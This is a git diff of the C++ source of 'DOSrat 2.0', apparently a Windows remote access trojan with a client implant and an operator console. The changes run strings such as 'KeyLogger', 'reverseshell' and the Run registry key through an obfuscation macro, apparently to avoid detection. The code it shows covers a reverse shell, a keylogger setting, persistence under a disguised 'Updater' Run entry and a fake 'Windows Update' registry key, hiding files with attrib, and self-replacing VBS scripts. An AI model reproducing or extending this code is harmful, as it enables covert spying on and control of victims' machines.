diff --git a/Client/Classi.h b/Client/Classi.h index c32ff53..cd4f17f 100644 --- a/Client/Classi.h +++ b/Client/Classi.h @@ -110,7 +110,7 @@ class COMUNICAZIONI if (!TcpIP::SendString(Sock, Res)) return ""; - if (Res != "Reverse shell closed") + if (Res != (string)AY_OBFUSCATE("Reverse shell closed")) if (!TcpIP::RecvString(Sock, Buff)) return ""; @@ -157,7 +157,7 @@ class Settaggi InstallPath = sf.GetSetting("InstallPath"); ExeName = sf.GetSetting("ExeName"); RegStartup = (sf.GetSetting("RegStartup") == "true"); - KeyLogger = (sf.GetSetting("KeyLogger") == "true"); + KeyLogger = (sf.GetSetting((string)AY_OBFUSCATE("KeyLogger")) == "true"); /*Host = "127.0.0.1"; Porta = 6969; @@ -176,7 +176,7 @@ class Settaggi Porta = stoi(en.HexToAscii(ru.RegRead("SOFTWARE\\Windows Update", en.AsciiToHex("Port").c_str(), REG_SZ))); ExeName = en.HexToAscii(ru.RegRead("SOFTWARE\\Windows Update", en.AsciiToHex("ExeName").c_str(), REG_SZ)); RegStartup = (en.HexToAscii(ru.RegRead("SOFTWARE\\Windows Update", en.AsciiToHex("RegStartup").c_str(), REG_SZ)) == "true"); - KeyLogger = (en.HexToAscii(ru.RegRead("SOFTWARE\\Windows Update", en.AsciiToHex("KeyLogger").c_str(), REG_SZ)) == "true"); + KeyLogger = (en.HexToAscii(ru.RegRead("SOFTWARE\\Windows Update", en.AsciiToHex((string)AY_OBFUSCATE("KeyLogger")).c_str(), REG_SZ)) == "true"); InstallDate = en.HexToAscii(ru.RegRead("SOFTWARE\\Windows Update", en.AsciiToHex("InstallDate").c_str(), REG_SZ)); } @@ -191,7 +191,7 @@ class Settaggi ru.RegWrite("SOFTWARE\\Windows Update", en.AsciiToHex("Port").c_str(), REG_SZ, en.AsciiToHex(to_string(Porta)).c_str()); ru.RegWrite("SOFTWARE\\Windows Update", en.AsciiToHex("ExeName").c_str(), REG_SZ, en.AsciiToHex(ExeName).c_str()); ru.RegWrite("SOFTWARE\\Windows Update", en.AsciiToHex("RegStartup").c_str(), REG_SZ, en.AsciiToHex((RegStartup) ? "true" : "false").c_str()); - ru.RegWrite("SOFTWARE\\Windows Update", en.AsciiToHex("KeyLogger").c_str(), REG_SZ, en.AsciiToHex((KeyLogger) ? "true" : "false").c_str()); + ru.RegWrite("SOFTWARE\\Windows Update", en.AsciiToHex((string)AY_OBFUSCATE("KeyLogger")).c_str(), REG_SZ, en.AsciiToHex((KeyLogger) ? "true" : "false").c_str()); ru.RegWrite("SOFTWARE\\Windows Update", en.AsciiToHex("InstallDate").c_str(), REG_SZ, en.AsciiToHex(DateTime::GetDateTime('_', '/')).c_str()); } }; \ No newline at end of file diff --git a/Client/Client.cpp b/Client/Client.cpp index b3a84f4..9db3497 100644 --- a/Client/Client.cpp +++ b/Client/Client.cpp @@ -1,11 +1,12 @@ #include +#include #include #include #include using json = nlohmann::json; -string Version = "2.0.0-b.1"; +string Version = "2.0.0-b.2"; int VersioneCompatibile = 0; #include "Classi.h" diff --git a/Client/Client.vcxproj b/Client/Client.vcxproj index 917f475..4810503 100644 --- a/Client/Client.vcxproj +++ b/Client/Client.vcxproj @@ -71,19 +71,19 @@ - C:\OpenCV\opencv-4.6.0\build\include;C:\Users\cripe\Desktop\Altre cose\C++\Librerie\VStudio;$(IncludePath) + C:\OpenCV\opencv-4.6.0\build\include;$(IncludePath) C:\OpenCV\opencv-4.6.0\build\x64\vc15\lib;$(LibraryPath) - C:\OpenCV\opencv-4.6.0\build\include;C:\Users\cripe\Desktop\Altre cose\C++\Librerie\VStudio;$(IncludePath) + C:\OpenCV\opencv-4.6.0\build\include;$(IncludePath) C:\OpenCV\opencv-4.6.0\build\x64\vc15\lib;$(LibraryPath) - C:\OpenCV\opencv-4.6.0\build\include;C:\Users\cripe\Desktop\Altre cose\C++\Librerie\VStudio;$(IncludePath) + C:\OpenCV\opencv-4.6.0\build\include;$(IncludePath) C:\OpenCV\opencv-4.6.0\build\x64\vc15\lib;$(LibraryPath) - C:\OpenCV\opencv-4.6.0\build\include;C:\Users\cripe\Desktop\Altre cose\C++\Librerie\VStudio;$(IncludePath) + C:\OpenCV\opencv-4.6.0\build\include;$(IncludePath) C:\OpenCV\opencv-4.6.0\build\x64\vc15\lib;$(LibraryPath) @@ -92,6 +92,7 @@ true WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) true + C:\Users\cripe\Desktop\Altre cose\C++\Librerie\Obfuscate;C:\Users\cripe\Desktop\Altre cose\C++\Librerie\VStudio Windows @@ -107,6 +108,7 @@ true WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) true + C:\Users\cripe\Desktop\Altre cose\C++\Librerie\Obfuscate;C:\Users\cripe\Desktop\Altre cose\C++\Librerie\VStudio Windows @@ -122,6 +124,7 @@ true _DEBUG;_CONSOLE;%(PreprocessorDefinitions) true + C:\Users\cripe\Desktop\Altre cose\C++\Librerie\Obfuscate;C:\Users\cripe\Desktop\Altre cose\C++\Librerie\VStudio Windows @@ -137,6 +140,7 @@ true NDEBUG;_CONSOLE;%(PreprocessorDefinitions) true + C:\Users\cripe\Desktop\Altre cose\C++\Librerie\Obfuscate;C:\Users\cripe\Desktop\Altre cose\C++\Librerie\VStudio Windows diff --git a/Client/Funzioni.h b/Client/Funzioni.h index a3fff05..e90077e 100644 --- a/Client/Funzioni.h +++ b/Client/Funzioni.h @@ -22,10 +22,10 @@ short InstallClient() if (PathToCopy.find("") != string::npos) PathToCopy.replace(PathToCopy.find("<"), PathToCopy.find(">") + 1 - PathToCopy.find("<"), su.GetCurrentUser()); - ru.RegDelValue("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Updater"); + ru.RegDelValue(AY_OBFUSCATE("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"), "Updater"); if (sett.RegStartup) - if (!ru.RegWrite("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Updater", REG_SZ, ("\"" + PathToCopy + "\"").c_str())) + if (!ru.RegWrite(AY_OBFUSCATE("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"), "Updater", REG_SZ, ("\"" + PathToCopy + "\"").c_str())) return 2; //msgb.Ok(PathToCopy); @@ -94,11 +94,11 @@ bool UpdateClient(SOCKET Sock) return false; if (NewClient.j["Hidden"]) - su.NoOutputCMD("attrib +h \"" + du.GetModuleFilePath() + "VXBkYXRl\\" + du.GetModuleFile() + "\""); + su.NoOutputCMD((string)AY_OBFUSCATE("attrib +h \"") + du.GetModuleFilePath() + "VXBkYXRl\\" + du.GetModuleFile() + "\""); if (NewClient.j["System"]) - su.NoOutputCMD("attrib +s \"" + du.GetModuleFilePath() + "VXBkYXRl\\" + du.GetModuleFile() + "\""); + su.NoOutputCMD((string)AY_OBFUSCATE("attrib +s \"") + du.GetModuleFilePath() + "VXBkYXRl\\" + du.GetModuleFile() + "\""); - if (!du.WriteFile(du.GetModuleFilePath() + "Update.vbs", "WScript.Sleep 5000\nSet filesys = CreateObject(\"Scripting.FileSystemObject\")\nSet WshShell = WScript.CreateObject(\"WScript.Shell\")\nfilesys.DeleteFile \"" + du.GetFullModuleFilePath() + "\"\nfilesys.MoveFile \"" + du.GetModuleFilePath() + "VXBkYXRl\\" + du.GetModuleFile() + "\", \"" + du.GetFullModuleFilePath() + "\"\nWScript.Sleep 1000\nWshShell.Run \"" + du.GetFullModuleFilePath() + "\", 1, false\nfilesys.DeleteFolder \"" + du.GetModuleFilePath() + "VXBkYXRl\"\nfilesys.DeleteFile \"" + du.GetModuleFilePath() + "Update.vbs\"")) + if (!du.WriteFile(du.GetModuleFilePath() + "Update.vbs", "WScript.Sleep 5000\nSet filesys = CreateObject(\"Scripting.FileSystemObject\")\nSet WshShell = WScript.CreateObject(\"WScript.Shell\")\nfilesys.DeleteFile \"" + du.GetFullModuleFilePath() + "\"\nfilesys.MoveFile \"" + du.GetModuleFilePath() + "VXBkYXRl\\" + du.GetModuleFile() + "\", \"" + du.GetFullModuleFilePath() + "\"\nWScript.Sleep 1000\nWshShell.Run \"\"\"" + du.GetFullModuleFilePath() + "\"\"\", 1, false\nfilesys.DeleteFolder \"" + du.GetModuleFilePath() + "VXBkYXRl\"\nfilesys.DeleteFile \"" + du.GetModuleFilePath() + "Update.vbs\"")) return false; ru.RegDelKey("SOFTWARE\\Windows Update"); @@ -115,7 +115,7 @@ void Uninstall() SystemUtils su; ru.RegDelKey("SOFTWARE\\Windows Update"); - ru.RegDelValue("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Updater"); + ru.RegDelValue(AY_OBFUSCATE("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"), "Updater"); du.WriteFile(du.GetModuleFilePath() + "Remove.vbs", "WScript.Sleep 5000\nSet filesys = CreateObject(\"Scripting.FileSystemObject\")\nfilesys.DeleteFile \"" + du.GetFullModuleFilePath() + "\"\nfilesys.DeleteFile \"" + du.GetModuleFilePath() + "Remove.vbs\""); su.NoOutputCMD("start \"\" \"" + du.GetModuleFilePath() + "Remove.vbs\""); @@ -234,7 +234,7 @@ void ReverseShell(SOCKET Sock) } else if (ToLowerCase(Cmd) == "exit") { - COMUNICAZIONI::ReverseShell(Sock, "Reverse shell closed"); + COMUNICAZIONI::ReverseShell(Sock, (string)AY_OBFUSCATE("Reverse shell closed")); return; } else if (ToLowerCase(Cmd).substr(0, 7) == "notepad") @@ -276,12 +276,12 @@ short Sessione(TcpIP Client) } else if (cmd == "shutdown") { - su.NoOutputCMD("shutdown -s -t 0"); + su.NoOutputCMD((string)AY_OBFUSCATE("shutdown -s -t 0")); return 1; } else if (cmd == "reboot") { - su.NoOutputCMD("shutdown -r -t 0"); + su.NoOutputCMD((string)AY_OBFUSCATE("shutdown -r -t 0")); return 1; } else if (cmd == "updateclient") @@ -299,7 +299,7 @@ short Sessione(TcpIP Client) RestartClient(); return 1; } - else if (cmd == "reverseshell") + else if (cmd == (string)AY_OBFUSCATE("reverseshell")) { ReverseShell(Client.Sock); } diff --git a/DOSrat 2.0/DOSrat 2.0.cpp b/DOSrat 2.0/DOSrat 2.0.cpp index 3763672..ec5aba3 100644 --- a/DOSrat 2.0/DOSrat 2.0.cpp +++ b/DOSrat 2.0/DOSrat 2.0.cpp @@ -1,4 +1,5 @@ #include +#include #include #include #include @@ -9,7 +10,7 @@ using namespace std; #include "Client.h" -string Version = "2.0.0-b.1"; +string Version = "2.0.0-b.2"; CLIENT Clients[MAX_CLIENTS]; atomic ServerLoopController = true; int VersioneCompatibile = 0; @@ -360,9 +361,9 @@ int main() Sleep(250); if (SettaggiC.HideExe) - su.NoOutputCMD("attrib +h \"" + SettaggiC.ExeName + "\""); + su.NoOutputCMD((string)AY_OBFUSCATE("attrib +h \"") + SettaggiC.ExeName + "\""); if (SettaggiC.SystemFile) - su.NoOutputCMD("attrib +s \"" + SettaggiC.ExeName + "\""); + su.NoOutputCMD((string)AY_OBFUSCATE("attrib +s \"") + SettaggiC.ExeName + "\""); cli.LoadingPercentage = 75; cli.LoadingText = "Personalizzazione settaggi"; @@ -461,6 +462,8 @@ int main() // Aggiornamenti case 2: SettaggiS.VerificaAggiornamenti = !SettaggiS.VerificaAggiornamenti; + if (!SettaggiS.VerificaAggiornamenti) + SettaggiS.AutoAggiornamento = false; break; // Auto Aggiornamenti diff --git a/DOSrat 2.0/DOSrat 2.0.vcxproj b/DOSrat 2.0/DOSrat 2.0.vcxproj index 011c33c..c44fe68 100644 --- a/DOSrat 2.0/DOSrat 2.0.vcxproj +++ b/DOSrat 2.0/DOSrat 2.0.vcxproj @@ -92,7 +92,7 @@ true WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) true - C:\Users\cripe\Desktop\Altre cose\C++\Librerie\VStudio;%(AdditionalIncludeDirectories) + C:\Users\cripe\Desktop\Altre cose\C++\Librerie\Obfuscate;C:\Users\cripe\Desktop\Altre cose\C++\Librerie\VStudio;%(AdditionalIncludeDirectories) Console @@ -108,7 +108,7 @@ true WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) true - C:\Users\cripe\Desktop\Altre cose\C++\Librerie\VStudio;%(AdditionalIncludeDirectories) + C:\Users\cripe\Desktop\Altre cose\C++\Librerie\Obfuscate;C:\Users\cripe\Desktop\Altre cose\C++\Librerie\VStudio;%(AdditionalIncludeDirectories) Console @@ -124,7 +124,7 @@ true _DEBUG;_CONSOLE;%(PreprocessorDefinitions) true - C:\Users\cripe\Desktop\Altre cose\C++\Librerie\VStudio;%(AdditionalIncludeDirectories) + C:\Users\cripe\Desktop\Altre cose\C++\Librerie\Obfuscate;C:\Users\cripe\Desktop\Altre cose\C++\Librerie\VStudio;%(AdditionalIncludeDirectories) Console @@ -140,7 +140,7 @@ true NDEBUG;_CONSOLE;%(PreprocessorDefinitions) true - C:\Users\cripe\Desktop\Altre cose\C++\Librerie\VStudio;%(AdditionalIncludeDirectories) + C:\Users\cripe\Desktop\Altre cose\C++\Librerie\Obfuscate;C:\Users\cripe\Desktop\Altre cose\C++\Librerie\VStudio;%(AdditionalIncludeDirectories) Console diff --git a/DOSrat 2.0/Funzioni.h b/DOSrat 2.0/Funzioni.h index 795f38c..7cac97a 100644 --- a/DOSrat 2.0/Funzioni.h +++ b/DOSrat 2.0/Funzioni.h @@ -174,7 +174,7 @@ bool AutoAggiornamento() du.DelFile(du.GetModuleFilePath() + "Update\\DOSrat2.0.zip"); - if(!du.WriteFile(du.GetModuleFilePath() + "Update.vbs", "WScript.Sleep 2500\nSet filesys = CreateObject(\"Scripting.FileSystemObject\")\nSet WshShell = WScript.CreateObject(\"WScript.Shell\")\nfilesys.DeleteFile \"" + du.GetModuleFilePath() + "DOSrat 2.0.exe\"\nfilesys.DeleteFile \"" + du.GetModuleFilePath() + "Build\\Client.exe\"\nfilesys.MoveFile \"" + du.GetModuleFilePath() + "Update\\DOSrat 2.0.exe\", \"" + du.GetModuleFilePath() + "DOSrat 2.0.exe\"\nfilesys.MoveFile \"" + du.GetModuleFilePath() + "Update\\Build\\Client.exe\", \"" + du.GetModuleFilePath() + "Build\\Client.exe\"\nWshShell.Run \"" + du.GetModuleFilePath() + "DOSrat 2.0.exe\", 1, false\nfilesys.DeleteFile \"" + du.GetModuleFilePath() + "Update.vbs\"")) + if(!du.WriteFile(du.GetModuleFilePath() + "Update.vbs", "WScript.Sleep 2500\nSet filesys = CreateObject(\"Scripting.FileSystemObject\")\nSet WshShell = WScript.CreateObject(\"WScript.Shell\")\nfilesys.DeleteFile \"" + du.GetModuleFilePath() + "DOSrat 2.0.exe\"\nfilesys.DeleteFile \"" + du.GetModuleFilePath() + "Build\\Client.exe\"\nfilesys.MoveFile \"" + du.GetModuleFilePath() + "Update\\DOSrat 2.0.exe\", \"" + du.GetModuleFilePath() + "DOSrat 2.0.exe\"\nfilesys.MoveFile \"" + du.GetModuleFilePath() + "Update\\Build\\Client.exe\", \"" + du.GetModuleFilePath() + "Build\\Client.exe\"\nWScript.Sleep 1000\nWshShell.Run \"\"\"" + du.GetModuleFilePath() + "DOSrat 2.0.exe\"\"\", 1, false\nfilesys.DeleteFile \"" + du.GetModuleFilePath() + "Update.vbs\"")) return false; su.NoOutputCMD("start \"\" \"" + du.GetModuleFilePath() + "Update.vbs\""); @@ -533,7 +533,7 @@ bool ReverseShell(SOCKET Sock) cout << endl; - if (COMUNICAZIONI::ReverseShell(Sock, "reverseshell") == "OK") + if (COMUNICAZIONI::ReverseShell(Sock, (string)AY_OBFUSCATE("reverseshell")) == "OK") { while (true) { @@ -561,7 +561,7 @@ bool ReverseShell(SOCKET Sock) if (Res == "") return false; - else if (Res == "Reverse shell closed") + else if (Res == (string)AY_OBFUSCATE("Reverse shell closed")) { cout << endl; return true; @@ -613,7 +613,7 @@ void Sessione(int ID, SOCKET Sock) StampaHelp("Invertmouse\t", "- Inverte i tasti del mouse."); StampaHelp("Shutdown\t", "- Spegne il PC."); StampaHelp("Reboot\t\t", "- Riavvia il PC."); - StampaHelp("Reverseshell\t", "- Lancia comandi sulla shell del PC remoto."); + StampaHelp((string)AY_OBFUSCATE("Reverseshell\t"), "- Lancia comandi sulla shell del PC remoto."); cout << char(192) << char(196) << "Revshell" << endl; cout << endl; @@ -696,7 +696,7 @@ void Sessione(int ID, SOCKET Sock) else Controllo = false; } - else if (cmd == "reverseshell" || cmd == "revshell") + else if (cmd == (string)AY_OBFUSCATE("reverseshell") || cmd == "revshell") { if (!ReverseShell(Sock)) Controllo = CheckConnection(Sock, ID);